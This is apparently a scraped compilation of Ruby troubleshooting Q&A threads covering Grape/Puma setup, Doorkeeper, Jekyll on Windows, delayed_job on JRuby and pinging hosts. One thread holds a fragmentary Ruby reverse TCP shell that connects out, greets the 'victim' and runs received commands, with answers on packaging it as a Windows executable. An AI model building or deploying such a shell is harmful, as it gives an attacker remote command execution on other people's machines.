Grape stand alone rest api ERROR: No application configured, nothing to run - ruby

I have followed this tutorial step by step:
However I get the error:
Puma starting in single mode...
Version 3.6.2 (ruby 2.2.2-p95), codename: Sleepy Sunday Serenity
Min threads: 0, max threads: 16
Environment: development
ERROR: No application configured, nothing to run
when I run puma in In ./myapp
I am running it on a MacOs.
I am new to grape and I would love some guidance. I have literally simply followed the tutorial up to "Run the following to startup the server after every changeā€¦
In ./myapp
$ puma"

I got my answer from Daniel #!forum/ruby-grape
There was a syntax error, his code below fixed my problem, I appreciate it.
require 'rubygems'
require 'grape'
Dir.glob("**/*.rb").each do |f|
puts "Loaded #{f}"
require_relative "../#{f}" unless File.absolute_path(f) == __FILE__


Ruby compile with ocra error - libssp-0.dll not found

I'm trying to compile a simple reverse TCP shell written in ruby with ocra.
The code is pretty simple:
#!/usr/bin/env ruby
require 'socket'
require 'open3'
#Remote Host IP
RHOST = ""
#Remote Host Port
PORT = "6969"
#Tries to connect every 5 seconds
sock = "#{RHOST}","#{PORT}"
sock.puts "You are connected to your victim"
puts "Retrying..."
sleep 5
#Runs the commands you type and sends you back the stdout and stderr.
while line = sock.gets && line
Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
IO.copy_stream(stdout_and_stderr, sock)
I build it with: ocra RevShell.rb --verbose
I get no error messages but whenever I try to run the .exe I get the following error: "C:\Users\Andrea\AppData\Local\Temp\ocrE30.tmp\bin\ruby_builtin_dlls\libssp-0.dll not found"
Am I missing something? Ocra should check the needed requirements by itself adding it to the exe by I still miss this dll.
Thanks for your help.
Maybe you don't have the libssp-0.dll file installed. You can download it from then placing the file where the error says.
Use --dll ruby_builtin_dlls\libssp-0.dll.
See for more details.
I faced the same problem with Ruby 2.6 and 2.7 (x64) installed by RubyInstaller.
In my case, libssp-0.dll surely exists at the ruby_builtin_dlls directory, but somehow it was not included in the compiled exe while other dlls in the same directory are all included.
For time being, I could evade this problem by using (x86) version of Ruby 2.7.

When running an application under ruby 2.3.1 using the rails server command, the following error occurs: can not modify a frozen array (RuntimeError)

I have to run an application developed in Ruby on rails. ruby 2.3.1 and rails 4.2.0
When I execute the rails server command. I get the following error:
.... config / initializers / doorkeeper.rb: 75: in <top (required)>: can not modify a frozen array (RuntimeError).
Can I explain how to succeed to no longer have this error, thank you
Info :
The "bundle install" command runs successfully.
The code around doorkeepee.rb near line 75 : Doorkeeper.configuration.token_grant_types << "password"
I'm trying to understand how RAIL_ENV works. Can you help me at the same time?

--watch arg is unsupported on Windows

I'm new to jekyll so first I follow this tutorial Jekyll on Windows and setup jekyll 3.3.0.I got an error about the certificate this tutorial SSL CERTIFICATE UPDATES
and by using this cacert.pem certificate solve the problem.
However,when start jekyll server I get:
--watch arg is unsupported on Windows.
If you are on Windows Bash, please see:
I try to solve this problem using Let Jekyll --watch without any luck.
If I use jekyll 3.2.1 every things work okay but the problem with jekyll 3.3.0.
So how to solve this problem ?
I Solve my problem reading this and comment some code in the build.rb file at C:\tools\ruby23\lib\ruby\gems\2.3.0\gems\jekyll-3.3.0\lib\jekyll\commands
To enable autoregeration and now every things work okay.
def watch(site, options)
# Jekyll.logger.warn "", "--watch arg is unsupported on Windows. "
# Jekyll.logger.warn "", "If you are on Windows Bash, please see: " \
# ""
# else
External.require_with_graceful_fail "jekyll-watch"
watch_method = Jekyll::Watcher.method(:watch)
if watch_method.parameters.size == 1
options, site
# end
I think you can just type jekyll serve.
It's windows bash error, Jekyll or Windows will fix it soon, till then you can use jekyll 3.2.1 version.
Here I commit my answer.
I solved the problem by installing Ruby 2.3.3, DevKit-mingw64 and jekyll 3.4.3

delayed_job gem - NotImplementedError: fork is not available on this platform

I am using jruby (1.7.3 or 1.7.9), delayed_job (1.8.4), daemons (1.1.9) gems for my rails 2.3.17 application.
I am trying to start the delayed job server using command:
1. jruby script/delayed_job start
RuntimeError: ObjectSpace is disabled; each_object will only work with Class, pass -X+O to enable
each_object at org/jruby/
daemonize at /home/user/projects/new_central_repo/mml/mml_services/vendor/gems/delayed_job-1.8.4/lib/delayed/command.rb:39
(root) at script/delayed_job:5
To resolve this error, I passed "-X+O" option & ran following command:
jruby -X+O script/delayed_job start
This has resolved "ObjectSpace is disabled" error but I am getting following error on local.
NotImplementedError: fork is not available on this platform
fork at org/jruby/
safefork at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/daemonize.rb:11
call_as_daemon at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/daemonize.rb:43
start_proc at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/application.rb:259
start at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/application.rb:296
run at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/controller.rb:70
run_proc at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons.rb:197
call at org/jruby/
call at org/jruby/
catch_exceptions at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons/cmdline.rb:109
run_proc at /home/user/.rvm/gems/ext-jruby-1.7.9#jruby179-rails2317/gems/daemons-1.1.9/lib/daemons.rb:196
daemonize at /home/user/projects/new_central_repo/mml/mml_services/vendor/gems/delayed_job-1.8.4/lib/delayed/command.rb:45
times at org/jruby/
daemonize at /home/user/projects/new_central_repo/mml/mml_services/vendor/gems/delayed_job-1.8.4/lib/delayed/command.rb:43
(root) at script/delayed_job:5
Anyone can help me to resolve this error.
Locally I am able to start my server using "jrake jobs:work" command but I am not whether I can use "jrake jobs:work" instead of "jruby script/delayed_job start".
You cannot use delayed_job on jruby because it relies on Fork which is not available in jruby.

ruby ping for 1.9.1

I want to ping a site in my ruby code and saw that net-ping was a nice library to do this with. Unfortunately, when I tried to gem install net-ping I got the following error:
C:>gem install net-ping
ERROR: Error installing net-ping:
win32-open3 requires Ruby version < 1.9.0.
upon further research, I found that net-ping was not available yet for 1.9.X. Does anyone have a good piece of code that pings that they would be willing to share.
If by 'site' you mean website, then I wouldn't use ping. Ping will tell you if the host is up (unless a router or firewall is blocking ICMP), but it won't tell you if your web server or web app is responding properly.
If that's the case, I'd recommend Net::HTTP from the standard library, or any of the other HTTP libraries. One way to do it is:
def up?(site)'/').kind_of? Net::HTTPOK
up? '' #=> true
You can always do this and use regexps to parse the result or just check the exit status:
ping_count = 10
server = ""
result = `ping -q -c #{ping_count} #{server}`
if ($?.exitstatus == 0) do
puts "Device is up!"
Ping return values that you can check against:
The ping utility returns an exit status of zero if at least one response was heard from the specified host; a status of two if the transmission was successful but no responses were received; or another value (from <sysexits.h>) if an error occurred.
For windows follow these instructions:
download from
unzip, cd in the folder
gem build net-ping.gemspec
gem install net-ping-1.5.3-universal-mingw32.gem
gem install win32-security
to use it:
require 'net/ping'
p'', 'http').ping?
Use from source
gem "net-ping", :git => 'git://'
# bundle install
Now you can use functions from it in 1.9.2
